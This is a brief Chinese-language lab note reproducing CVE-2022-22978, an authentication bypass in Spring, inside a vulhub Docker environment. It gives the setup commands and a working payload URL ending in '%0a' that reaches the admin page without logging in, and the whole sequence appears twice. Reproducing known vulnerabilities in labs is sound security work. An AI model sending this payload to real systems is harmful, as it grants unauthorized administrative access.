环境搭建
cd vulhub/spring/CVE-2022-22978
docker-compose up -d
启动服务后访问http://ip:8080
漏洞复现
访问admin页面
需要认证登录,构造payload
http://ip:8080/admin/index%0a
绕过admin认证,登录成功
cd vulhub/spring/CVE-2022-22978
docker-compose up -d
启动服务后访问http://ip:8080
访问admin页面
需要认证登录,构造payload
http://ip:8080/admin/index%0a
绕过admin认证,登录成功